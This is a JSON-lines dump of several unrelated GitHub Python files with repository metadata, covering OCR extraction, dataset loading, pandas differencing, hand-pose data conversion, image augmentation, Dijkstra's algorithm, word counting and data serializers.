cv2.destroyAllWindows()\n\n stop_time = time.time()\n duration = stop_time-start_time\n # l = [dict(zip([1],[x])) for x in range(1,2)]\n # breakpoint()\n # print(f\"text: {text}, duration: {duration}\")\n result['images']+=[croped_image.split('/')[-1]]\n result['resolution']+=[image.shape[:2]]\n result['text_extracted_processed']+=[text]\n result['duration_in_microseconds']+=[duration]\n result['Actual_text']+=['']\n result['remarks']+=['']\n return result\n\n\n\n# folder_path = '/home/pooja/yolov5_tapansir/runs/detect/exp95/crops/number_plate'\n\n# number_extracted = tess_num_detect_with_folder()\n# # print(type(number_extracted))\n\n\n# df = pd.DataFrame(number_extracted)\n# df.to_csv('/home/pooja/yolov5_tapansir/result_processed.csv')\n# print(\"check result !!!\")\n\n\n# res = ocr_extractor()\n# df = pd.DataFrame(res)\n# df.to_csv('/home/pooja/yolov5_tapansir/result_blur_effect3.csv')\n# print(\"check result !!!\")\n\n\n\n# pip install goslate -->> translates languages.","repo_name":"pooja-crossml/Phidelta","sub_path":"utils/text_extractor.py","file_name":"text_extractor.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74886164004","text":"import pathlib\n\nimport torch\nfrom torchvision import transforms\nfrom torchvision.transforms import functional as F\nfrom torch.utils.data import random_split, Subset\n\n\"\"\" This file is used for various data-set utilities, e.g. 
generating a dataloader object.\n\"\"\"\n\n\ndef load_dataset(dataset_name, **kwargs):\n \"\"\" Loads the specified dataset and returns a PyTorch dataset object.\n\n Applies the standard transformations for said dataset by default.\n \"\"\"\n data_path = pathlib.Path('data').resolve()\n\n if dataset_name == 'cifar10':\n from torchvision.datasets import CIFAR10\n\n # This is the standard normalization transformation\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n # User can specify to load the training set; loads the test set by default.\n train = kwargs.pop('train', False)\n dataset = CIFAR10(data_path, train=train, transform=transform, download=True)\n elif dataset_name == 'cifar100':\n from torchvision.datasets import CIFAR100\n\n # This is the standard normalization transformation\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n # User can specify to load the training set; loads the test set by default.\n train = kwargs.pop('train', False)\n dataset = CIFAR100(data_path, train=train, transform=transform, download=True)\n elif dataset_name == 'imagenet':\n # Requires imagenet to be downloaded locally\n from torchvision.datasets import ImageNet\n\n # Standard transformation\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n dataset = ImageNet(data_path / 'imagenet', split='val', transform=transform)\n elif dataset_name == 'cifar10r':\n from data.nonstationary_datasets import CIFAR10R\n dataset = CIFAR10R()\n elif dataset_name == 'cifar100r':\n from data.nonstationary_datasets import CIFAR100R\n dataset = CIFAR100R()\n elif dataset_name == 'cifar10gb':\n from data.nonstationary_datasets import CIFAR10GB\n dataset = CIFAR10GB()\n elif dataset_name == 'cifar100gb':\n from data.nonstationary_datasets import CIFAR100GB\n dataset = CIFAR100GB()\n elif dataset_name == 'cifar10imba':\n from data.imbalanced_datasets import CIFAR10Imba\n dataset = CIFAR10Imba(class_ratios=kwargs['class_ratios'])\n else:\n raise NotImplementedError\n\n return dataset\n\n\ndef get_cal_eval_split(dataset_name, num_eval, **kwargs):\n \"\"\" Splits the given dataset into disjoint calibration / evaluation subsets.\n\n Args:\n dataset_name: str ;\n num_eval: int ; size of evaluation set\n \"\"\"\n dataset = load_dataset(dataset_name, **kwargs)\n num_cal = len(dataset) - num_eval\n cal_dataset, eval_dataset = random_split(dataset, [num_cal, num_eval])\n if 'num_cal' in kwargs.keys():\n cal_dataset = Subset(cal_dataset, torch.arange(kwargs['num_cal']))\n\n return cal_dataset, eval_dataset\n","repo_name":"GavinKerrigan/bayesian-calibration","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10441091027","text":"# 提供された関数 differentiate は、Pandasのデータフレームを操作して、指定した列の差分を計算し、元のデータフレームに新しい列として追加する関数です。関数の引数とその動作について説明します:\n\n# df: 差分を計算する対象のデータフレーム。\n# ver: 差分を計算する列の名前。\n# on: データをグループ化するための列の名前。デフォルトは 'user_id'。\n# dir: 差分を計算する方向。デフォルトは 1(前方差分)。-1を指定すると後方差分が計算されます。\n# 関数の動作手順:\ndef differentiate(df, ver, on='user_id', dir=1):\n # _df という新しいデータフレームを df のコピーとして作成します。\n _df = df.copy()\n # _df を on 列でグループ化し、指定された ver 
列に対して前方または後方の差分を計算します。結果は新しい _df データフレームに格納されます。\n _df = _df.groupby([on], as_index=False)[[ver]].diff(dir)\n # _df の列名を 'd_' + ver に変更します。これにより、新しい列名が 'd_' で始まるようになります。\n _df.columns = ['d_'+ver]\n # 元のデータフレーム df に計算された差分列を結合します。\n df = df.join(_df)\n # 不要な _df を削除し、メモリを解放します。\n del _df\n # 最終的に元のデータフレーム df を返します。\n gc.collect()\n return df\n\n# この関数を使用することで、データフレーム内の特定の列に対して前方または後方の差分を計算し、新しい列として追加できます。計算された差分は、元のデータを補完するのに役立つことがあります。\n# gc.collect() は、Pythonの標準ライブラリである gc(ガベージコレクション)モジュールから提供される関数で、メモリのガベージコレクションを明示的にトリガーするために使用されます。ガベージコレクションは、不要なメモリを解放し、Pythonプログラムのパフォーマンスを向上させるために行われるプロセスです。\n# 具体的には、gc.collect() を呼び出すことで、Pythonのメモリ管理システムは現在の実行環境で不要とされるオブジェクトを収集し、それらのメモリを解放します。\n# 通常、Pythonは自動的にメモリ管理を行いますが、大規模なオブジェクトやデータ処理を行った後、メモリが完全に解放されない場合があるため、gc.collect() を使用して明示的にガベージコレクションをトリガーすることがあります。\n# gc.collect() を呼び出すことは、メモリリーク(不要なメモリの確保)を防ぐために役立ちます。ただし、通常は必要な場合にのみ使用すべきであり、プログラム全体で頻繁に呼び出す必要はありません。メモリ管理は通常、Pythonインタプリタによって効果的に処理されます。\n# 注意: gc.collect() の過度な使用は、パフォーマンスの低下や不安定な動作を引き起こす可能性があるため、慎重に使用する必要があります。通常、普段は手動でガベージコレクションをトリガーする必要はありません。\n\n\n\n# 提供された関数 differentiate を使用して、具体的なPythonコードの例を示します。この例では、サンプルデータを使用して関数を実行し、差分列を計算し新しい列として追加します。\nimport pandas as pd\nimport gc\n\n# サンプルデータフレームを作成\ndata = {\n 'user_id': [1, 1, 1, 2, 2, 3, 3],\n 'value': [10, 12, 15, 20, 22, 30, 35],\n}\n\ndf = pd.DataFrame(data)\n\n# differentiate関数を使用して前方差分を計算し、新しい列として追加\ndf = differentiate(df, ver='value', on='user_id', dir=1)\n\n# このコードでは、以下のことが行われています:\n# サンプルのデータフレーム df を作成し、'user_id' 列と 'value' 列が含まれていま���。\n# differentiate 関数を呼び出し、ver='value' で 'value' 列の差分を計算するように指定し、on='user_id' で 'user_id' 列をグループ化の基準として指定します。また、dir=1 で前方差分を計算するように指定します。\n# 計算された差分列は 'd_value' という名前で新しい列として元のデータフレーム df に追加されます。\n# 出力結果は以下のようになります:\n\n# user_id value d_value\n# 0 1 10 NaN\n# 1 1 12 2.0\n# 2 1 15 3.0\n# 3 2 20 NaN\n# 4 2 22 2.0\n# 5 3 30 NaN\n# 6 3 35 5.0\n\n# 結果として、'd_value' 列が追加され、 'value' 列の前方差分が計算されています。最初の行にはNaN(欠損値)が表示されます。このように、differentiate 関数を使用することで、データフレーム内の特定の列に対して前方または後方の差分を計算し、新しい列として追加できます。\n","repo_name":"ChanhiYasutomi/Code_For_DataAnalysis_For_Python","sub_path":"def differentiate.py","file_name":"def differentiate.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19534571471","text":"# this file is modified from the original code:\n# https://github.com/xingyizhou/DeepModel\n\nimport numpy as np\nimport h5py\nimport scipy.io as sio\nimport scipy.misc as misc\nimport sys\nimport os\nimport math\n\nfrom skimage.transform import resize\n\nfrom PIL import Image\n\nimport cv2\n\n## This part of code is modified from [DeepPrior](https://cvarlab.icg.tugraz.at/projects/hand_detection/)\ndef CropImage(depth, com, cube_size):\n u, v, d = com\n zstart = d - cube_size / 2.\n zend = d + cube_size / 2.\n \n # pricinal points are omitted (due to simplicity?)\n xstart = int(math.floor((u * d / fx - cube_size / 2.) / d * fx))\n xend = int(math.floor((u * d / fx + cube_size / 2.) / d * fx))\n ystart = int(math.floor((v * d / fy - cube_size / 2.) / d * fy))\n yend = int(math.floor((v * d / fy + cube_size / 2.) 
/ d * fy))\n \n cropped = depth[max(ystart, 0):min(yend, depth.shape[0]), max(xstart, 0):min(xend, depth.shape[1])].copy()\n cropped = np.pad(cropped, ((abs(ystart)-max(ystart, 0), abs(yend)-min(yend, depth.shape[0])), \n (abs(xstart)-max(xstart, 0), abs(xend)-min(xend, depth.shape[1]))), mode='constant', constant_values=0)\n msk1 = np.bitwise_and(cropped < zstart, cropped != 0)\n msk2 = np.bitwise_and(cropped > zend, cropped != 0)\n cropped[msk1] = zstart\n cropped[msk2] = zend\n\n dsize = (img_size, img_size)\n wb = (xend - xstart)\n hb = (yend - ystart)\n if wb > hb:\n sz = (dsize[0], (int)(hb * dsize[0] / wb))\n else:\n sz = ((int)(wb * dsize[1] / hb), dsize[1])\n\n roi = cropped\n \n \n rz = cv2.resize(cropped, sz)\n # maxmin = cropped.max() - cropped.min()\n # cropped_norm = (cropped - cropped.min()) / maxmin\n # rz = maxmin * resize(cropped_norm, sz, mode='reflect', preserve_range=True) + cropped.min()\n # rz = rz.astype(np.float32)\n\n ret = np.ones(dsize, np.float32) * zend\n xstart = int(math.floor(dsize[0] / 2 - rz.shape[1] / 2))\n xend = int(xstart + rz.shape[1])\n ystart = int(math.floor(dsize[1] / 2 - rz.shape[0] / 2))\n yend = int(ystart + rz.shape[0])\n ret[ystart:yend, xstart:xend] = rz\n\n return ret\n\ndef readDepth(path):\n \"\"\"\n Note: In each depth png file the top 8 bits of depth are\n packed into the green channel and the lower 8 bits into blue.\n See http://cims.nyu.edu/~tompson/NYU_Hand_Pose_Dataset.htm#download\n Ref: [1]\n \"\"\"\n rgb = Image.open(path)\n print(rgb)\n r, g, b = rgb.split()\n\n r = np.asarray(r, np.int32)\n g = np.asarray(g, np.int32)\n b = np.asarray(b, np.int32)\n\n # dpt = b + g*256\n\n dpt = np.bitwise_or(np.left_shift(g, 8), b)\n imgdata = np.asarray(dpt, np.float32)\n return imgdata\n\n##\nJ = 31\n# joint_id = np.array([0, 3, 6, 9, 12, 15, 18, 21, 24, 25, 27, 30, 31, 32, 1, 2, 4, 7, 8, 10, 13, 14, 16, 19, 20, 22, 5, 11, 17, 23, 28])\njoint_id = np.array([0, 1, 2, 3, 4, 6, 7, 8, 9, 10, 12, 13, 14, 15, 16, 18, 19, 20, 21, 22, 5, 11, 17, 23, 32, 30, 31, 28, 27, 25, 24])\nimg_size = 128\n\nfx = 588.03\nfy = 587.07\nfu = 320.\nfv = 240.\n\ndata_names = ['train', 'test_1', 'test_2']\ncube_sizes = [300, 300, 300]\nid_starts = [0, 0, 2440]\nid_ends = [72756, 2440, 8252]\n#id_ends = [727, 2440, 8252]\n# num_packages = [3, 1, 1]\nnum_packages = [1, 1, 1]\n\ndef makeH5(root='../data/nyu14/'):\n\n for D in range(0, len(data_names)):\n data_name = data_names[D]\n cube_size = cube_sizes[D]\n id_start = id_starts[D]\n id_end = id_ends[D]\n chunck_size = (int)((id_end - id_start) / num_packages[D])\n\n task = 'train' if data_name == 'train' else 'test'\n data_path = '{}/{}'.format(root, task)\n label_path = '{}/joint_data.mat'.format(data_path)\n\n labels = sio.loadmat(label_path)\n joint_uvd = labels['joint_uvd'][0]\n joint_xyz = labels['joint_xyz'][0]\n\n cnt = 0\n chunck = 0\n depth_h5, joint_h5, com_h5, = [], [], []\n for idx in range(id_start, id_end):\n img_path = '{}/depth_1_{:07d}.png'.format(data_path, idx + 1)\n\n if not os.path.exists(img_path):\n print('{} Not Exists!'.format(img_path))\n continue\n\n print(img_path)\n depth = readDepth(img_path)\n\n # is joint_uvc[id, 34] center of mass???\n \n depth = CropImage(depth, joint_uvd[idx, 34], cube_size)\n\n com3D = joint_xyz[idx, 34]\n joint = joint_xyz[idx][joint_id] - com3D\n \n # normalize depth to [-1,1] and resize to one of the shape [128,128]\n depth = ((depth - com3D[2]) / (cube_size / 2)).reshape(1, img_size, img_size)\n\n # normalized ground truth joint 3d coordinates to [-1,1]\n joint 
= np.clip(joint / (cube_size / 2), -1, 1)\n depth_h5.append(depth.astype(np.float32))\n joint_h5.append(joint.astype(np.float32).reshape(3 * J))\n com_h5.append(com3D.copy())\n cnt += 1\n if cnt % chunck_size == 0 or idx == id_end - 1:\n dH5 = os.path.join(root, 'h5data/')\n try:\n os.makedirs(dH5)\n except OSError:\n pass\n \n # rng = np.arange(cnt) if task == 'test' else np.random.choice(np.arange(cnt), cnt, replace = False)\n dset = h5py.File((dH5+'/{}_{}.h5').format(data_name, chunck), 'w')\n dset['depth'] = np.asarray(depth_h5)\n dset['joint'] = np.asarray(joint_h5)\n dset['com'] = np.asarray(com_h5)\n dset.close()\n chunck += 1\n cnt = 0\n \nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Specify the root directory of NYU14 directory as argument')\n else:\n makeH5(sys.argv[1])\n","repo_name":"jakeoung/handpose_pytorch","sub_path":"code/datasets/GetH5DataNYU.py","file_name":"GetH5DataNYU.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"14952180676","text":"import os\n\nimport PIL.Image as image\n\nroot = '../data'\ndatasets = ['IDRID', 'DDR']\n\n\ndef do_augment(image_name, mask_name):\n img = image.open(os.path.join(img_path, image_name))\n mask = image.open(os.path.join(mask_path, mask_name))\n\n img.save(os.path.join(img_path, image_name[:-4] + \".jpg\"))\n img.transpose(image.ROTATE_180).save(os.path.join(img_path, image_name[:-4] + \"_180.jpg\"))\n img.transpose(image.ROTATE_90).save(os.path.join(img_path, image_name[:-4] + \"_90.jpg\"))\n img.transpose(image.ROTATE_270).save(os.path.join(img_path, image_name[:-4] + \"_270.jpg\"))\n img.transpose(image.FLIP_LEFT_RIGHT).save(os.path.join(img_path, image_name[:-4] + \"_horizontal.jpg\"))\n img.transpose(image.FLIP_TOP_BOTTOM).save(os.path.join(img_path, image_name[:-4] + \"_vertical.jpg\"))\n\n mask.save(os.path.join(mask_path, mask_name[:-4] + \".png\"))\n mask.transpose(image.ROTATE_180).save(os.path.join(mask_path, mask_name[:-4] + \"_180.png\"))\n mask.transpose(image.ROTATE_90).save(os.path.join(mask_path, mask_name[:-4] + \"_90.png\"))\n mask.transpose(image.ROTATE_270).save(os.path.join(mask_path, mask_name[:-4] + \"_270.png\"))\n mask.transpose(image.FLIP_LEFT_RIGHT).save(os.path.join(mask_path, mask_name[:-4] + \"_horizontal.png\"))\n mask.transpose(image.FLIP_TOP_BOTTOM).save(os.path.join(mask_path, mask_name[:-4] + \"_vertical.png\"))\n\n\nif __name__ == \"__main__\":\n\n for dataset in datasets:\n print(dataset)\n img_path = os.path.join(root, dataset, 'image/train')\n mask_path = os.path.join(root, dataset, 'label/train/annotations')\n\n for mask_name in os.listdir(mask_path):\n image_name = mask_name[:-4] + '.jpg'\n if not os.path.exists(os.path.join(img_path, image_name)):\n print('not found ' + os.path.join(mask_path, mask_name))\n continue\n print(mask_name)\n do_augment(image_name, mask_name)\n","repo_name":"CVIU-CSU/M2MRF-Lesion-Segmentation","sub_path":"tools/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"17675103591","text":"import heapq\r\n\r\nN, M = map(int, input().split())\r\n\r\nG = [[] for _ in range(N)]\r\n\r\ncost = []\r\nfor i in range(N):\r\n cost.append([10**10]*N)\r\n\r\nfor _ in range(M):\r\n u, v, c = map(int, input().split())\r\n\r\n G[u].append(v)\r\n cost[u][v] = c\r\n\r\nQ = []\r\nheapq.heappush(Q, (0,0))\r\n\r\ndist = [-1 for _ in 
range(N)]\r\ndist[0] = 0\r\n\r\ndone = [False for _ in range(N)]\r\n\r\nwhile len(Q) > 0:\r\n    # d: distance, i: vertex\r\n    d, i = heapq.heappop(Q)\r\n\r\n    if done[i]:\r\n        continue\r\n\r\n    done[i] = True\r\n\r\n    # G is the adjacency array mapping each vertex to its neighboring vertices\r\n    for j in G[i]:\r\n        # edge weight\r\n        c = cost[i][j]\r\n\r\n        # if the vertex has not been seen yet or its shortest distance can be updated\r\n        if dist[j] == -1 or dist[j] > dist[i] + c:\r\n            dist[j] = dist[i] + c\r\n            heapq.heappush(Q, (dist[j], j))\r\n\r\nprint(dist[N-1])","repo_name":"someya-takashi/AtCoder","sub_path":"Algorithm/dijkstra/dijkstra_heap.py","file_name":"dijkstra_heap.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70417479205","text":"\n\nimport heapq\nclass Solution(object):\n    def eatenApples(self, apples, days):\n        \"\"\"\n        :type apples: List[int]\n        :type days: List[int]\n        :rtype: int\n        \"\"\"\n        total, pos = 0, 1\n        N, Q = len(apples), []\n        \n        for i in range(N):\n            if apples[i] == 0:\n                continue\n            heapq.heappush(Q, [i+days[i]+1, apples[i], i+1])\n        stack = []\n        while Q:\n            if pos >= Q[0][0]:\n                stack.append(heapq.heappop(Q))\n                continue\n            \n            rotten, count, j = Q[0]\n            pos = max(pos, j)\n            m = min(count, rotten - pos+1)\n            if m > 0:\n                pos += m\n                total += m \n            print(Q[0], total, pos)\n            stack.append(heapq.heappop(Q))\n        \n        print(stack)\n        print(total)\n        \n        \n        \nif __name__ == '__main__':\n    s = Solution()\n    # s.eatenApples([2,1,1,4,5],[10,10,6,4,2])\n    s.eatenApples([1,2,3,5,2],[3,2,1,4,2])","repo_name":"icecraft/cuda-improve","sub_path":"tools/1705.py","file_name":"1705.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14902996719","text":"\"\"\"\n    ---Task 3---\nIn a large text string, count the number of occurrences of each word and return the 10 most frequent ones. Do not take punctuation\nmarks or letter case into account. As a basis, take any article from Wikipedia or from the documentation of the language.\n\"\"\"\nfrom string import punctuation\n\n\ndef count_words(text):\n    for char in punctuation:\n        text = text.replace(char, \"\")\n\n    text = text.lower()\n    words = text.split()\n\n    word_counts = {}\n    for word in words:\n        if word in word_counts:\n            word_counts[word] += 1\n        else:\n            word_counts[word] = 1\n\n    most_common_words = sorted(word_counts.items(), key=lambda x: x[1], reverse=True)[:10]\n    return most_common_words\n\n\ntext = 'Python is dynamically typed and garbage-collected. It supports multiple programming paradigms, including ' \\\n       'structured (particularly procedural), object-oriented and functional programming. It is often described as a 
It is often described as a ' \\\n '\"batteries included\" language due to its comprehensive standard library.'\n\nmost_common_words = count_words(text)\nprint(most_common_words)\n","repo_name":"caregor/EntPy_HW_3","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12962551683","text":"import itertools\nimport json\nimport os\nfrom collections import defaultdict\nfrom typing import DefaultDict, Dict, List, Optional, Sequence, Union\n\nfrom jsonlines import Reader, Writer\n\nfrom ..utils.context import timed_operation\nfrom ..utils.detection_types import JsonDict, Pathlike\nfrom ..utils.identifier import get_uuid_from_str\nfrom ..utils.pdf_utils import PDFStreamer\nfrom ..utils.tqdm import get_tqdm\nfrom ..utils.utils import FileExtensionError, is_file_extension\nfrom .base import DataFlow\nfrom .common import FlattenData, JoinData, MapData\nfrom .custom import CacheData, CustomDataFromIterable, CustomDataFromList\n\n__all__ = [\"SerializerJsonlines\", \"SerializerFiles\", \"SerializerCoco\", \"SerializerPdfDoc\", \"SerializerTabsepFiles\"]\n\n\ndef _reset_df_and_get_length(df: DataFlow) -> int:\n df.reset_state()\n try:\n length = len(df)\n except NotImplementedError:\n length = 0\n return length\n\n\nclass SerializerJsonlines:\n \"\"\"\n Serialize a dataflow from a jsonlines file. Alternatively, save a dataflow of JSON objects to a .jsonl file.\n\n **Example:**\n\n df = SerializerJsonlines.load(\"path/to/file.jsonl\")\n df.reset_state()\n for dp in df:\n ... # is a dict\n \"\"\"\n\n @staticmethod\n def load(path: Pathlike, max_datapoints: Optional[int] = None) -> CustomDataFromIterable:\n \"\"\"\n :param path: a path to a .jsonl file.\n :param max_datapoints: Will stop the iteration once max_datapoints have been streamed\n\n :return: dataflow to iterate from\n \"\"\"\n file = open(path, \"r\") # pylint: disable=W1514,R1732\n iterator = Reader(file)\n return CustomDataFromIterable(iterator, max_datapoints=max_datapoints)\n\n @staticmethod\n def save(df: DataFlow, path: Pathlike, file_name: str, max_datapoints: Optional[int] = None) -> None:\n \"\"\"\n Writes a dataflow iteratively to a .jsonl file. Every datapoint must be a dict where all items are serializable.\n As the length of the dataflow cannot be determined in every case max_datapoint prevents generating an\n unexpectedly large file\n\n :param df: The dataflow to write from.\n :param path: The path, the .jsonl file to write to.\n :param file_name: name of the target file.\n :param max_datapoints: maximum number of datapoint to consider writing to a file.\n \"\"\"\n\n if not os.path.isdir(path):\n raise NotADirectoryError(path)\n if not is_file_extension(file_name, \".jsonl\"):\n raise FileExtensionError(f\"Expected .jsonl file got {path}\")\n\n df.reset_state()\n with open(os.path.join(path, file_name), \"w\") as file: # pylint: disable=W1514\n writer = Writer(file)\n for k, dp in enumerate(df):\n if max_datapoints is None:\n writer.write(dp)\n elif k < max_datapoints:\n writer.write(dp)\n else:\n break\n\n\nclass SerializerTabsepFiles:\n \"\"\"\n Serialize a dataflow from a tab separated text file. 
Alternatively, save a dataflow of plain text\n    to a .txt file.\n\n    **Example:**\n\n        df = SerializerTabsepFiles.load(\"path/to/file.txt\")\n\n    will yield each text line of the file.\n    \"\"\"\n\n    @staticmethod\n    def load(path: Pathlike, max_datapoints: Optional[int] = None) -> CustomDataFromList:\n        \"\"\"\n        :param path: a path to a .txt file.\n        :param max_datapoints: Will stop the iteration once max_datapoints have been streamed\n\n        :return: dataflow to iterate from\n        \"\"\"\n\n        with open(path, \"r\", encoding=\"UTF-8\") as file:\n            file_list = file.readlines()\n        return CustomDataFromList(file_list, max_datapoints=max_datapoints)\n\n    @staticmethod\n    def save(df: DataFlow, path: Pathlike, file_name: str, max_datapoints: Optional[int] = None) -> None:\n        \"\"\"\n        Writes a dataflow iteratively to a .txt file. Every datapoint must be a string.\n        As the length of the dataflow cannot be determined in every case, max_datapoints prevents generating an\n        unexpectedly large file\n\n        :param df: The dataflow to write from.\n        :param path: The path, the .txt file to write to.\n        :param file_name: name of the target file.\n        :param max_datapoints: maximum number of datapoint to consider writing to a file.\n        \"\"\"\n\n        if not os.path.isdir(path):\n            raise NotADirectoryError(path)\n        if not is_file_extension(file_name, \".txt\"):\n            raise FileExtensionError(f\"Expected .txt file got {path}\")\n\n        with open(os.path.join(path, file_name), \"w\", encoding=\"UTF-8\") as file:\n            for k, dp in enumerate(df):\n                if max_datapoints is None:\n                    file.write(dp)\n                elif k < max_datapoints:\n                    file.write(dp)\n                else:\n                    break\n\n\nclass SerializerFiles:\n    \"\"\"\n    Serialize files from a directory and all subdirectories. Only one file type can be serialized. Once specified, all\n    other types will be filtered out.\n    \"\"\"\n\n    @staticmethod\n    def load(\n        path: Pathlike,\n        file_type: Union[str, Sequence[str]],\n        max_datapoints: Optional[int] = None,\n        shuffle: Optional[bool] = False,\n        sort: Optional[bool] = True,\n    ) -> DataFlow:\n        \"\"\"\n        Generates a dataflow where a datapoint consists of a string of names of files with respect to some file type.\n        If you want to load the files you need to do this in a following step by yourself.\n\n        :param path: A path to some base directory. 
Will inspect all subdirectories, as well\n :param file_type: A file type (suffix) to look out for (single str or list of stings)\n :param max_datapoints: Stop iteration after passing max_datapoints\n :param shuffle: Shuffle the files, so that the order of appearance in dataflow is random.\n :param sort: If set to \"True\" it will sort all selected files by its string\n :return: dataflow to iterate from\n \"\"\"\n df: DataFlow\n df1: DataFlow\n df2: DataFlow\n df3: DataFlow\n\n if shuffle:\n sort = False\n it1 = os.walk(path, topdown=False)\n it2 = os.walk(path, topdown=False)\n df1 = CustomDataFromIterable(it1)\n df2 = CustomDataFromIterable(it2)\n df1 = MapData(df1, lambda dp: None if len(dp[2]) == 0 else dp)\n df2 = MapData(df2, lambda dp: None if len(dp[2]) == 0 else dp)\n df1 = MapData(df1, lambda dp: [dp[0]] * len(dp[2]))\n df2 = MapData(df2, lambda dp: dp[2])\n df1 = FlattenData(df1)\n df2 = FlattenData(df2)\n df3 = JoinData(df_lists=[df1, df2])\n df3 = MapData(df3, lambda dp: os.path.join(dp[0], dp[1]))\n df = MapData(df3, lambda dp: dp if is_file_extension(dp, file_type) else None)\n if max_datapoints is not None or sort:\n df_list = CacheData(df).get_cache()\n if sort:\n df_list.sort()\n df = CustomDataFromList(df_list, max_datapoints=max_datapoints, shuffle=False)\n elif shuffle:\n df_list = CacheData(df).get_cache()\n df = CustomDataFromList(df_list, shuffle=shuffle)\n\n return df\n\n @staticmethod\n def save() -> None:\n \"\"\"\n Not implemented\n \"\"\"\n raise NotImplementedError\n\n\nclass CocoParser:\n \"\"\"\n A simplified version of the Microsoft COCO helper class for reading annotations. It currently supports only\n bounding box annotations\n\n :param annotation_file: location of annotation file\n \"\"\"\n\n def __init__(self, annotation_file: Optional[Pathlike] = None) -> None:\n self.dataset: JsonDict = {}\n self.anns: Dict[int, JsonDict] = {}\n self.cats: Dict[int, JsonDict] = {}\n self.imgs: Dict[int, JsonDict] = {}\n\n self.img_to_anns: DefaultDict[int, List[int]] = defaultdict(list)\n self.cat_to_imgs: DefaultDict[int, List[int]] = defaultdict(list)\n\n if annotation_file is not None:\n with timed_operation(message=\"Loading annotations to memory\"):\n with open(annotation_file, \"r\", encoding=\"UTF-8\") as file:\n dataset = json.load(file)\n if not isinstance(dataset, dict):\n raise TypeError(f\"Annotation file format {type(dataset)} for {annotation_file} not supported\")\n self.dataset = dataset\n self._create_index()\n\n def _create_index(self) -> None:\n with timed_operation(message=\"creating index\"):\n anns, cats, imgs = {}, {}, {}\n img_to_anns, cat_to_imgs = defaultdict(list), defaultdict(list)\n if \"annotations\" in self.dataset:\n for ann in self.dataset[\"annotations\"]:\n img_to_anns[ann[\"image_id\"]].append(ann)\n anns[ann[\"id\"]] = ann\n\n if \"images\" in self.dataset:\n for img in self.dataset[\"images\"]:\n imgs[img[\"id\"]] = img\n\n if \"categories\" in self.dataset:\n for cat in self.dataset[\"categories\"]:\n cats[cat[\"id\"]] = cat\n\n if \"annotations\" in self.dataset and \"categories\" in self.dataset:\n for ann in self.dataset[\"annotations\"]:\n cat_to_imgs[ann[\"category_id\"]].append(ann[\"image_id\"])\n\n self.anns = anns\n self.img_to_anns = img_to_anns\n self.cat_to_imgs = cat_to_imgs\n self.imgs = imgs\n self.cats = cats\n\n def info(self) -> None:\n \"\"\"\n Print information about the annotation file.\n \"\"\"\n for key, value in self.dataset[\"info\"].items():\n print(f\"{key}: {value}\")\n\n def get_ann_ids(\n self,\n 
img_ids: Optional[Union[int, Sequence[int]]] = None,\n cat_ids: Optional[Union[int, Sequence[int]]] = None,\n area_range: Optional[Sequence[int]] = None,\n is_crowd: Optional[bool] = None,\n ) -> Sequence[int]:\n \"\"\"\n Get ann ids that satisfy given filter conditions. default skips that filter\n\n :param img_ids: get anns for given imgs\n :param cat_ids: get anns for given cats\n :param area_range: get anns for given area range (e.g. [0 inf])\n :param is_crowd: get anns for given crowd label (False or True)\n\n :return: ids: integer array of ann ids\n \"\"\"\n\n if img_ids is None:\n img_ids = []\n if cat_ids is None:\n cat_ids = []\n if area_range is None:\n area_range = []\n\n img_ids = [img_ids] if isinstance(img_ids, int) else img_ids\n cat_ids = [cat_ids] if isinstance(cat_ids, int) else cat_ids\n\n if len(img_ids) == len(cat_ids) == len(area_range) == 0:\n anns = self.dataset[\"annotations\"]\n else:\n if not len(img_ids) == 0:\n lists = [self.img_to_anns[img_id] for img_id in img_ids if img_id in self.img_to_anns]\n anns = list(itertools.chain.from_iterable(lists))\n else:\n anns = self.dataset[\"annotations\"]\n anns = anns if len(cat_ids) == 0 else [ann for ann in anns if ann[\"category_id\"] in cat_ids]\n anns = (\n anns if len(area_range) == 0 else [ann for ann in anns if area_range[0] < ann[\"area\"] < area_range[1]]\n )\n if is_crowd is not None:\n ids = [ann[\"id\"] for ann in anns if ann[\"iscrowd\"] == is_crowd]\n else:\n ids = [ann[\"id\"] for ann in anns]\n return ids\n\n def get_cat_ids(\n self,\n category_names: Optional[Union[str, Sequence[str]]] = None,\n super_category_names: Optional[Union[str, Sequence[str]]] = None,\n category_ids: Optional[Union[int, Sequence[int]]] = None,\n ) -> Sequence[int]:\n \"\"\"\n Filtering parameters. 
